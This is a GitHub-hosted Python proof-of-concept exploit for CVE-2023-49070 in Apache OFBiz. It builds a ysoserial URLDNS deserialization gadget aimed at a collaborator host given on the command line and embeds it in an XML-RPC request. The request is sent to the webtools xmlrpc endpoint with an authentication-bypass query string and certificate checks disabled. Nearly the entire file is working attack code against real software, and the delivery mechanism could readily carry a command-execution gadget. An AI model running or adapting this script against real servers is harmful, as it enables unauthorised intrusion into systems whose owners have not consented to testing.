-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2023-49070.py
52 lines (47 loc) · 1.82 KB
/
CVE-2023-49070.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
import requests
import subprocess
import base64
import sys
from colorama import Fore, Style
Gcyan = Fore.YELLOW + Style.BRIGHT
Cyan = Fore.CYAN + Style.BRIGHT
STOP = Style.RESET_ALL
logo = '''
______ _______ ____ ___ ____ _____ _ _ ___ ___ _____ ___
/ ___\ \ / | ____| |___ \ / _ |___ \|___ / | || | / _ \ / _ |___ / _ \ /
| | \ \ / /| _| _____ __) | | | |__) | |_ \ _____| || || (_) | | | | / | | | |
| |___ \ V / | |__|_____/ __/| |_| / __/ ___) |_____|__ _\__, | |_| |/ /| |_| |
\____| \_/ |_____| |_____|\___|_____|____/ |_| /_/ \___//_/ \___/
'''
print(Gcyan + logo + STOP)
print(Cyan + "PoC Script" + STOP + Gcyan + " By: 0xRobiul\n" + STOP)
url=str(sys.argv[1])
colab="http://"+str(sys.argv[2])
headers = {
'Content-Type': 'application/xml'
}
payload_gen=subprocess.check_output(["java","-jar","ysoserial-all.jar","URLDNS",colab])
base64_enc=base64.b64encode(payload_gen).decode()
payload = '''<?xml version="1.0"?>
<methodCall>
<methodName>Dns</methodName>
<params>
<param>
<value>
<struct>
<member>
<name>rce</name>
<value>
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">
%s
</serializable>
</value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
'''%base64_enc
req=requests.post(url+"webtools/control/xmlrpc;/?USERNAME=Y&PASSWORD=Y&requirePasswordChange=Y",data=payload,headers=headers,verify=False)
print(Cyan + "Done!! Check Burp Colabrator!!" + STOP)